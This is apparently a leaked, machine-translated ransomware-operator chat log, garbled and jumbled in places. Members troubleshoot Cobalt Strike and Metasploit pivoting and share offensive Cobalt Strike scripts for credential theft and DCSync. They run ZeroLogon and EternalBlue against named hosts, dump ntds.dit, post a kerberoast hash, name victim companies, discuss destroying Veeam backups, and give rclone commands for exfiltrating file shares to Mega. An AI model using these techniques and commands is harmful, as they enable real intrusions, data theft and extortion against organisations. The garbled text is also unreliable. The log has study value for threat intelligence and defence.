 14...00 25 90 57 e5 8a ......Intel(R) 82574L Gigabit Network Connection #3
 13...00 25 90 57 e5 8b ......Intel(R) 82574L Gigabit Network Connection #2
 12...00 25 90 57 e5 8c ......Intel(R) 82574L Gigabit Network Connection
  1...........................Software Loopback Interface 1
 16...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 17...00 00 00 00 00 00 e0 Microsoft 6to4 Adapter
 21...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
          0.0.0.0 0.0.0.0 199.241.189.37 199.241.189.38 40
   10.212.134.110 255.255.255.255 On-link 10.212.134.110 257
    64.244.144.91 255.255.255.255 199.241.189.37 199.241.189.38 20
        127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
        127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 306
  127.255.255.255.255.255.255.255 On-link 127.0.0.1 306
      192.168.1.2 255.255.255.255 10.212.134.111 10.212.134.110 1
     192.168.1.16 255.255.255.255 10.212.134.111 10.212.134.110 1
   199.241.189.36 255.255.255.255.252 On-link 199.241.189.38 276
   199.241.189.38 255.255.255.255.255 On-link 199.241.189.38 276
   199.241.189.39 255.255.255.255.255 On-link 199.241.189.38 276
        240.0.0.0.0 On-link 127.0.0.1 306
        224.0.0.0 240.0.0.0 On-link 199.241.189.38 276
        224.0.0.0.0 240.0.0.0 On-link 10.212.134.110 257
  255.255.255.255.255.255.255.255 On-link 127.0.0.1 306
  255.255.255.255.255.255.255.255 On-link 199.241.189.38 276
  255.255.255.255.255.255.255.255.255 On-link 10.212.134.110 257
===========================================================================
Persistent Routes:
  Network Address Netmask Gateway Address Metric
          0.0.0.0 0.0.0.0 199.241.189.37 20
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination Gateway
 17 1041 ::/0 2002:c058:6301::1
  1 306 ::1/128 On-link
 17 1010 2002::/16 On-link
 17 266 2002:c7f1:bd26::c7f1:bd26/128
                                    On-link
 14 276 fe80::/64 On-link
 19 261 fe80::/64 On-link
 14 276 fe80::31f5:3b79:943a:4573/128
                                    On-link
 19 261 fe80::4cf6:80d9:8658:d4bc/128
                                    On-link
  1 306 ff00::/8 On-link
 14 276 ff00::/8 On-link
 19 261 ff00::/8 On-link
===========================================================================
Persistent Routes:
  None

C:\Users\Administrator>

``The task is to skip ngrok for further pumping of information.`` Guys, this is my case. But a question for everyone. I have fortic works , pps with white ipac. But not a single server is not climbing and not one server is not pinged. I tried to change the ip address manually but said I have it all right. How to be an idea ?Guys, this is my case. But a question for everyone. I have a fortic is working , pps with a white ipac. But no one server does not get on and no one server is not pinged. I tried to change the ip address manually but said I have it all right. How to be there are ideas ?Or how prabota this column sesionsda need 1 time to win and then there will be no problem) and work through the rdzhedtoneel just quit canokhek through an hour will be, I can look for more detailsperezvali options and looked for errors on their side changed the kobua I and the domain and without trying to blacklist domains mb.Hello all!!! Guys need your advice.

There is a network - the central point is organized through the VPN.
In the network AV WEBROOT + DEF.
I scanned the network - chose the server machines and flew there.
I let the encrypted DLL - no knock.
Turning off WEBROOT and DEF.
I fired up a SE - no hits.
Exe - no hits.
Checking everything on the other network - everything is OK!
I think maybe Ip do not like it. I change the cobu (without the certificate).
I generate pailoads, I start them up, all bypassed.
Target machine is looking at the internet.
I also disable firewall.
I change the target machine - repeat steps and all without result.

Questions:
1. Why can this happen?
2. What should I do about it?
3. What other options are there for getting a session?
wait for rollback on bitok :) thank you) hit the normal on pp) super) here's another showed ip norm) recently the situation was 1v1 - alt figured out that the conflict of local addresses. optimal - take a VPN with a white apache and clinga another ns server?specify sohostname.domain.comfull hostname.comfull hostname.plskin whatever host entered that he is not in the domain) probably have to enter the rdp in the domain still? thank you try to ask the hostname IP from the dns server 10 2 160 19
then climb on it so there is with the adfinder dns names only, trying to find out ip to ping, no ping) there are also a few ip, they pinged, but do not connect to the rip ``nslookup HOSTNAME 10.2.160.19
``Can you get on a host some so podpodney session or by rndp go to the server quiet and do things =)adfind should be removed from the context of the domain or specify a creed + dk server knocked out suchvpn itself 10.129.25.5 in the local 10.2.160.X go yes it dns in a local case that you attack ? `` DNS Servers . . . . . . . . : 10.2.160.19
                                       10.118.160.201
``din.local is not the domain you're looking for by ipconfig /all
``Hello, I wanted to clarify this question, there is an rdp and vpn from the network. I connect to this rdp to the VPN, all normal connects, run the coba immediately, knocking it off with the ipn vpn. But the server from the adfinder including DK does not ping and does not jump anywhere, in this case, need to enter this rdp in the domain? luna@all content from the folder LLVM overwrite the contents of the folder brooks-artifact-kit
entry points for rundll32.exe for generated dlls

```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``Bug@all all this stuff is in one script, please check functionality and make corrections if possible. If you find or come across something else interesting - add it, I will add it to a common set.
But ONLY what uses cobalt's native functionality, only .CNA files without any extra scripts, otherwise we'll clutter up everything here.

```
## AV_Query
AV_Query scans the registry for installed antiviruses
## upload
An alternate version of the upload command.  
Uploads a local file (first argument) to a remote host (second argument, optional).  
How to use: __upload </local/path/to/file> [/remote/path/to/file]__.  
Example usage: __beacon> upload implant.exe \\DC1\c$\\windows\temp\implant.exe__.  
## Blacklist
Blacklist for bacon. Deletes bacon if it is running on a computer where the username and computer are contained in the blacklist.  
__blacklist-add__ - add to blacklist
__blacklist-remove__ - remove from the blacklist.
__blacklist-show__ - show blblacklist
## Credpocalypse
Tracks bacon and collects credentials
Bacon usage:
    __begin_credpocalypse__ - track current bacon
	__end_credpocalypse [all]__ - stop tracking the current/all bacon
	__credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m
Use in the script console or another script:
    __begin_credpocalypse__ - track all bacon
	__end_credpocalypse [all]__stop tracking all bacon
	__credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m
Right-click on bacon to bring up the Credpocalypse menu
## powershell2
An alternate version of the powershell command with enhanced operational security
## Simple Beacon console status bar
Shows the working directory, changes the width of the last bacon indicator in the lower right corner to a fixed width
Adds option to cd command to return to previous directory.  
Usage: __cd -__
## dcom_shellexecute
Side-move with DCOM (ShellExecute)
Usage: __dcom_shellexecute [target] [listener]__ to create a new bacon on target via DCOM ShellExecute object
## DebugKit
Additional debugging tools in the DebugKit pop-up menu, the console script and in the bacon.  
Commands in the console script:
__!beaconinfo__ - get bacon information
__!loaded_powershell__ - show loaded powershell commands for each bacon
__!c2_sample_server__ - show what the responses from the C2 server look like
__!c2_sample_client__ - show how client requests look like
__!who__ - show all people connected to timeserver
__!pwn3d_hosts__ - show list of hostnames, that ever created sessions
__!show_data_keys__ - show keys in Cobalt Strike data model
__!query_data_key <key_name>__ - get values by key from Cobalt Strike data model
__!sync_all_downloads__ - synchronizes downloaded files from the Cobalt Strike server to the specified folder and recursively recreates the file paths that the files had on the target hosts
Usage: __!sync_all_downloads [/path/on/client/machine/to/save/downloads/to] <IP address of host to download files for>__
Commands in the bacon console:
__!iscsadmin__ - check the current bacon via the -isadmin function
## csfm.
Queries the database for known commands, outputs useful tips for the operator.  
Syntax:  __csfm [List]__ - listing all csfm options
Example: __search computer, tip ntlm__
## EDR.
Remotely polls the system for EDR products
Syntax: __edr_query [hostname] [arch]__
## Color Coded Files Listing
The script colors the output of the ls command and lets you see the downloaded files by highlighting them
## Forwarded_Ports
Tracks configured remote port forwardings on all bacons and allows you to easily remove them
Using 'rportfwd' quickly consumes the pool of available local ports from which outgoing traffic is forwarded, and tracking them manually becomes tedious on long projects. This script is designed to fill that gap by collecting these commands and presenting them in a nice visualization pane.  
## HighLight_Beacons.
Highlights new beacons in green, inactive ones in red.
## LogVis
Advanced visualization of the beacon console output.
## MASS-DCSYNC
DCSync attack applied to the list of domain users.
The user list file must contain one user per line.

## MIMIKATZ_ADDONS
Performs a password change that allows you to change the NTLM password for a given account.
Uses the Mimikatz password change feature, which allows you to change the NTLM password for a given account without registering setpassword events.

**Use:** password_change [Username] [Known old hash or password] [New hash or password] [SERVER/DC/localhost]

## PING_ALIASES
1. alias **qping** sends a command line ping packet.
**Use**: qping [target]. The **target** parameter is optional.
2. alias **smbscan** scans port 445.

## PORTSCAN_RESULTS
Menu item under View. When launched, a tab opens with the results of the smbscan run.

## PROCESSCOLOR
Highlighting process categories (antivirus, explorer, browsers, current process) in the beacon process manager (Explore => ProcessList).

## PS_WINDOW_ALIASES
alias **pspane** opens the process manager.
**Use:** pspane

## SLEEP_DOWN_WHEN_NO_OPERATORS
Increases the sleep interval for beacons that have no active (logged in) users.

## SMART_AUTOPPID
Reassigns execution of beacon commands and all beacon jobs to a designated process (svchost.exe).
All commands will be executed depending on context/privileges (user or system).
** Usage:** autoppid

## WIN2012MIMIKATZ
Adds a key to the registry for mimikatz to work.

vampir
BYI245Y52NCndjjYRhRmzagina you log in and write tweetuok now I'll give you a new account we are reorganizing not a big hello, heretut? the question is removed
i forgot i already told the grid, you can see the balls there) ``https://book.hacktricks.xyz/pentesting/pentesting-smb#list-shared-folders[ ](https://stylebrooks.com/group/discussion?msg=e2yKoiESHwgaYadiD) ``net share
? ``balls gathers advansedaypiskaner normally I looked at the code shairfinder, he does not do anything particularly criminal :) and you have just 200 servo?:smiley:I throw options, no more than that) certainly not through peches fuck all the cars you want? but I think the technologist will not approve this method :) now I say *rozetka * thanks!it will do if you run through psekes and take output which shows what network folders on this pc there is a command do not remember shorter commandimpacket yes it works, but do not poke the same 100 + servers through smbclient.rua there is also probably not a very good way, but that's it I tried to watch it, it kicks out access denied with the context Datam by the way yes, there is a problem with no vyutam module for SMB not one there is impacket live via sokstogda pinging ipakipet view does not work in this grid )``tasklist /s HOSTNAME
and the database servers will be detected without check mark \ALL I think if you uncheck the check boxes, just use eexcel to tidy up the check boxes and see all servers in bulk, no problem =) we have a couple hundred unmarked servers, we try to see where everything is) ``net view \\host
net view \\host /ALL

```
first balls
the second with local disks have not triggered AV ever but there is a tool not pale if for example server 2012 without amsi and we do through psyngect, is there any chance that AV will kill? anyone use sharefinder on a regular basis now?
I'm wondering if it can trigger an av or network proactiveNelsons4 who has run into a backup? can i get craps from there? of course. how is it with payments? does anyone have an outlook client, preferably not a trial? i think so, but it's like putting it in the trash and there's just no deletion option?cloud backups on viam who tried to crush? account got it. and how to remove? overwrite want to try, but mb have an alternative? threw the keys, all activated, cp) ` `PLZ92-LYS8J-ANV3S-SZRQ7-GPG3F
5JZ6S-B3FKJ-49YYP-HCCQN-3JVHX
TQZVQ-X36SC-SFZYC-TAC7E-BQF9S
2VZ8M-BYC2A-A3Y3P-6LQQ5-HNDN8
CJZXN-BWFDK-Q2Y2M-VSFCT-E7YLW
6KZ2V-A2UXK-YAWWC-YJ9QG-MW4RG
RSZXG-M2YDB-R5SWQ-3XR7Z-L42PN
ULZCW-2YQNG-FL83G-9DGLR-9TFQA
oh well, now I'll try it) lay on picaboy did so at least, the key got up without a cocksucker google and type in mb who knows where to get? does anyone by chance have the key to the face proxyfaer?[ ] (https://stylebrooks.com/group/discussion?msg=5auyX86kHct2PnDik) gotchaThere is no such thing on this network, subconsciously immediately started looking for a new bookmark))) @ali please quote the message and not respond to the topic (the button to the left)
there notifications have to closeObviously i have the ability to create bookmarks theredanu it turns out his computer is asleep just yet, if i do not kick it happily, and just do not connect? i eleventom first made a system session and it already injected another account may try but you "kick" the user will if he bookmark only on his workstation new artifact kit, all in the system does not migrate session from the admin * NetExtender Clients
put, yes 2fana, no you have 2fa yes? tShow bookmarks > there's no new bookmarks?
Alarm Trying to connect ...
There is a problem connecting to this machine, please check it... The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator.
``Work PC there what? I can't find where to add this tab. It feels like there's no such option in Sonicleave RDP
i'm logged in there without any credentials
I don't remember exactly but it was intuitively clear create new bookmark once redirected to the portal but there was no bookmark to connect to the PC
Same way, if you want to make a new bookmark go straight to that SMA try to make a session under another cookie, it doesn't ask me how, it tries to connect to 127.0.0.1:8877
the connection is made from your ip to the sonic gateway and then to the virtual desktop (or physical host) the SMA should be just put on the dedication and it will connect through the localhostsorry, confused with NetExtender Clients

in SMAConnect there proxy I enter: target ip, port 443, creeds?
I did and then I do not know what to do) they are fresh, here we had this, as I understand it sessions died justThrough him enter creeds, 2fa sendsThrough him try to enter was secur mobile accesses client? SonicWALL

- encoding the session ID in base64
```
>> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome)
- I add a cookie to the console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJWDPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal`
- It takes me back to the page `https://target/cgi-bin/welcome`

so for all three sessions in the Target
one session once redirected to the portal, but there were no bookmarks to connect to the PC

Anybody had problems with this? what did you do next? @rozetka @t3chnolog thanks for your help) everything started, "went ore)) "on port 80th https raise or 8443 maybe even cobalt to roll up and try it now you can just pull jobs with socks and start with another router repawn sessions do shortly I think you have a wrong configured router `tcp 0 0 185212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby I thought it was fucked up) it's a server with a msfu no external IP? are you behind a NAT or something? interface to your provider's LAN andmeterpreter > ipconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name : Microsoft Hyper-V Network Adapter #2
Hardware MAC : 00:15:5d:79:a8:19
MTU : 1500
IPv4 Address : 172.30.100.175
IPv4 Netmask : 255.255.255.0jobs -k number Print the socket list, take them all out and start one from the session you want mask /8 for 10.0.0.0 subnet only e.g. 172.8.240.5 what you have specified may not be recognized as a local address at all
10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8)
100.64.0.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses.
172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12)
192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16)
```
wikipedia if the second then you first put it ``172.0.0.0/8`` this strange? or ufw disable this one google local network masks then ``72.0.0.0/8`` your subnet mask is still strange, you know? add <subnet> session number what port forward and rules in ufw ``
IPv4 Active Routing Table
=========================

   Subnet Netmask Gateway
   ------ ------- -------
   172.30.0.0 255.0.0.0 Session 3
   172.30.100.0 240.0.0.0 Session 4
``route print show the socket should look in the router specified? port fwd is also another and there is no port forwarding on the server do not do? like this add 172.30.100.0/4 4 or tryroute add 172.0.0.0.0/4 4route add 172.0.0.0/8 session 4172.30.100.0/24 and as a router prescribed in what diap should "watch"? What I forgot to miss?
1) there is a session on the server in the coba it is not spawned
2) on the server to run sox to the local host can look into the network
What has been done : I prescribed the router
```
IPv4 Active Routing Table
   ------ ------- -------
   172.0.0.0 255.0.0.0 Session 4

```
2) Sox started : the port on the server opened and is listening
```
msf6 auxiliary(server/socks4a) > set srv
set srvhost set srvport
msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112
srvhost => 185.212.129.112
msf6 auxiliary(server/socks4a) > set srvport 1000
srvport => 1000
msf6 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000
[*] exec: netstat -antp | grep 1000
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
msf6 auxiliary(server/socks4a) > netstat -npl
[*] exec: netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby
tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
```
UFW disable

I prescribe in the proxychains ip server port, trying to ping hosts from the network are not pinged.I do not know well, but mba tipsPlease write to lsnu or mba someone knows regulars (although I do not know whether this issue can be resolved through regulars)anyone worked with databases maile:pass or similar bases for the brute force? data from sharepoint / office 365 has mastered who pull? already which time I met that they store dokichom vssadmin not suitable?
I did a snapshot, took everything, removed it, no traces, except logs)stewartThank you.https://github.com/zcgonvh/NTDSDumpEx@t3chnolog got it, thanks!
i can recommend some other software for the dekrypt, please?
https://github.com/Dionach/NtdsAudit/issues/3Господа, has anyone encountered this?
I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.`prince@Air give me hell here tomorrow will be a full update@alter and where the instructions) I wonder what the new tools with the context thinly but cranked up) it's like ms17 on win2008 buy a token or somethingdomain\usermake_token domain/user accounts from the remote where the VPN stretched went on and on but did not start then domain account took yesterday received a similar errorgetuid show[*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check
[+] host called home, sent: 114807 bytes
[+] received output:
Performing authentication attempts...
Unable to complete server challenge. Possible invalid name or network issues? beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[+] host called home, sent: 114279 bytes
[+] received output:
Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday
i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look?
yes, first tried it in meteor, and later in the coba with the flags worked)usually need interactive shell additional flags can be removed if it's a software clip can not, there is no such alas, only meteor daaga, thank you, decided just through him)throw the session meterpreter there interactive shell ...aha, got it, sorry)interactive shell? as far as i know you can not,i never had to,now i have come acrossHi all, who knows if it is possible to continue a query with cmd in coba?) let's say i sent a command to a particular shell soft.exe parametr , the answer came and keep the session to send a replyok thanks, i will look at examples to portscan cobalt, syntax error probably add ` ``icmp 1024
``Hi all!
beacon> portscan 192.168.0.0/24 445
[*] Tasked beacon to scan ports 445 on 192.168.0.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete

Why can this happen? The scan ends right away.
The range is exactly like this ``-size 10 -p \\host\share
Is it possible to distribute threads in the locker somehow to connected balls?) Increase them so that balls start locating faster without using the mega client) and event triggers are the same (if configured), the main thing that the signature is not detected on this all the same as when using the desktop mega client I think for this reason what?
in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from systems, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf
and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin open through the rdp, then it will only be happyxm
I've tried to open a session with an admin. when using it write if something is missing in the functionality, finalize it)tried it, normal tool) thank you now really do not need to get into the rdp cool, thank you is generally convenient, immediately after the ball put all the fs to skaii and went to do things) normal stuff should look only I have through the coba did not get something to copy aha)))) heh heh
okay
it means colleagues work with it, ok) we are also in business then)articles about it just started to use it as I understand it```
Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone
``Is the http protocol on any port in the process? how is it visible/not visible in the system after installing what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/гсІопевот more a guide on it
Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE
now there is no need to unzip mega files! everything is very quiet and unnoticeable!
I do not know how to describe it)
download rclon from the off-site. rclon.exe put it in the folder you need, then follow the manual.
clone everything you need. everything is downloaded via the clone, so the download speed is high.

Here's the guide. It's simple
https://rclone.org/mega/

next command to download

rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.

example

rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
Happy Christmas Eve to everybody! :)Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada:Happy Holidays to all)Happy New Year !!! :champagne_glass:in the profile search for wusaRemind pliz how to fix it in cobalt?
[-] could not spawn C:\Windows\system32\wusa.exe: 740
``like redirecting from local to domain, try domainnextcreditsmaybe someone has encountered this issue...
need to remotely enable port 3389 RDP on the LA (local admin)guys who encountered such a message? what is it in general and how to bypass@all d-box.com - whose fortik
@all groupemontoni.com - whose fort?

I repeat! execute-assemblyhttps://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogonвсем hello, does anyone have instructions on zerologon and proxilogon? who has encountered this error?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 5.199.174.223:4444
[-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
This is the first time I've had such a mess and problems ¯\\(ツ)_/¯or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rip and let it go through the console
 For example, let's take a batcher on host2 . So when I go to rndp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser to move to \host2\C$\programdata then I can easily delete that batch or copy a new one from host1 did not say the wrong session, I meant the logged in user on the host,  about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature) ` `.
>When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rndp and starting the same batnick, for example, everything is started normally.
```
I also met this once, what is it, I do not know, but most likely in the settings ADGod need advice. What can it be ?
The symptoms :
 1oe There is an account YES which normally goes everywhere. When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally.

2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session.
While on the same host as I pointed out above is not observed.
What can it be?  Some tricky settings in the GPO? Why on hrdp I can execute commands and remotely remotely does not work,
On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout"
 
PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard
and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who has faced, tell me, RedCloack AV on mimic sizzles?
gentlemen
if someone says so - write to PM
Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins?
Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama
1. the server on which the viam console, runs viam services but does not spin skl server
2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process
help who faced the problem is anyone online?
need help when working with Іssas thanks)[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) it pulls SharpChromium from the guitar, collects all chrome browsers[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) there was some sna script from the chinese. pulled it like. from polzak context switch someone pulled passes from microsoft edge via mimic? what command to pull? thanks)take 2 Ubuntu 18.04, watch this video and configure) ``https://www.youtube.com/watch?v=lT1dhfRKPwo
Ubuntu 18.04 !!!``and never been banned,I just googled for this purpose which accepts bits and does not ban for lifting the vpn hello all,advise a good hoster to lift the vpn on the server,thanks in advance)``
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzW1N1arhNiY
```
look, whose is it? maybe someone has a script or a program you can advise? or what kind of logs are you going to clean?
the detective it build?:thumbsup:hello if you have a problem with the rise of the session ks\msf - come on, there is a solution in the new rocket it is already there and do it so do it periodically pass the session no on vpnnet sessions want to tell all?
We are Wolt (belongs to Food & Beverage) from Germany. Our Site is: wolt.com
```
whose case? suddenly got in touch with the old someSteven like)Thankshttp://vc.ru/newtechaudit/108392-kak-posmotret-istoriyu-usb-podklyucheniy-k-stacionarnomu-kompyuteru-noutbukuhttp://pyatilistnik.org/kak-udalit-dannyie-o-usb-fleshkah-v-reestre-windows/их no system can not remove yet. so palyat when information is dragged insider in the event log? but definitely saw this somewhere long ago . there icons \ numbers from flashcards where - can't say in the registry is therespasiboposyal in the history of backup jobs it may bebackup panel you need to look at it to monitor the time of connection and if sohope to know if it's true there is an idea that they write to the removable drives straight history? most likely no way Good evening everyone, tell me - how can I look history of connected disks or removable media?i found sharpweb's hash, i'm looking for it badly. sharpweb can't do it, and sharpweb can't do it, but there's no compiled one, and invoke doesn't want to do it with history and nfua than to save history in browser and inexplorervampir how much broskerberos hash?hashes on the brute force you can throw meopotom will be farm, there are already working if you're about "kerberos hash" then look for someone with a farm, now we have a team as far as I know no one with a farm for brute force on cmd5.orgwhere do you brute force hashes?the username does not have admin rights again, looking at whether or not you have LAPS or take off the local admin and try it if you have rights for the logged in user, you can try to neighboring hosts his accountS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041 and on the user computer has system rights, win10 proms17 bypassed, triedC:\Temp>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 0
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.


C:\Temp>If your goal is not to study the math, but to get ahead as fast as possible, then fuck with ms17 and try it) Firstly, it is not certain that you will unboot this sqluser (see password policy in the corp, if it is hard, then forget it)
secondly, it doesn't mean you'll get out from under MSSQL (can you do xp_cmdshell?) i'll tell you about your situation. the point is that until you understand what the fuck it is and what kind of hashes and tickets you can't experiment it won't let you go anywhere because the user has no rights) i experimented[ ](http://wfy76wigkpoxqbe6onion/group/discussion?msg=4GWTca9k9tLBhidBj) shortest way to brute force this hash, service suggestion? well you can experimenttut here's PTT like dohttp://www.tarlogic.com/en/blog/how-to-attack-kerberos/а what options do you want besides brute force? pc4 you have there I understand you have no options? and you can brute force account ѕqq51B↩lusservot you have a ticket for access to MSSQL ``
 Client: web @ site.site.NO
Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 15:43:35 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
``[*] SamAccountName : sqluser
[*] DistinguishedName : CN=sqluser,OU=servicekontoer,OU=Brukere,DC=site,DC=site,DC=no
[*] ServicePrincipalName : MSSQLSvc/sitefil1.site.site.no:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.no:1433*
                             $EB8CBB4DE3FE7E85D546295C5751C113$94A8BAC69FFF58B63BCBFD195BAF31DF7B9ACCD69A201E
                             AAD2380BE7FC7FD181C4E380456869C3AD57B1BC069BCFDBE2EF0506B4863B55D6480EB67F118CB6
                             56FC5264570CFA71380CF73585CD87E02C43E7B73AC5FBB21453C06ED4779030CD832E1976FEAC7D
                             9922B46AAC80B96502B00E3C0174DFFFA980FDDD25969C007753DBAFB5A773969CB35AE749791FFB
                             69349831CA80696AE6E1CF4E18608EA32F5A33AA363427D9D1DEF134D36E49DD8CC765EA1F694AA6
                             6018BD881EB33D2A69263A45EED6CB0E2EB3EE19AD80E3652B907862E86F61F3A08A592D78E538C1
                             D2106EAA1395C7C12C59838E7514EA449E200D5531B2C034F2A111809409E24C8B0AE60B5A160882
                             C70C5B905D5B821A1E62F937248624DAC1C0E87D86BA6EA789072359FF1B2C1C78E1870140EFDE02
                             B6464FF4703A1D6922A59A02CE2211FFD2CE7EAA1D0C637A167E621DB67D8479784DF5B0E2F2B8E4
                             C722590DAA15A1572B288D3B564E75DAE2C114E2A3279C3645A2D66960A61921EA593BA1EDE6E78B
                             16BB939ECD6DF6AB415CDB995B67CA19E10B52AA416DCF5750F19E77FD6ADDB480B0A14626615710
                             39F4321C097888FC12EE2EEB900BEB8CAD51E9ABE3A92AE9E554853E4E3E9BC8C689925FD2D64BFD
                             BC3CB81B0B0E09801311F2807A2704F2D19334BAF9BEDC72669069BF8760D32CCD079A5B7753A19D
                             44526F4CC4ACEEE5239996855B7DE8100623368C4826A06483107DDEB5900330B0C33103CAEF17EA
                             0642B3A1C01F0A1F6B349DAE1E99D58B25D1855E5CC334DBE1867D2BA669DAF7EB968A271FBD380A
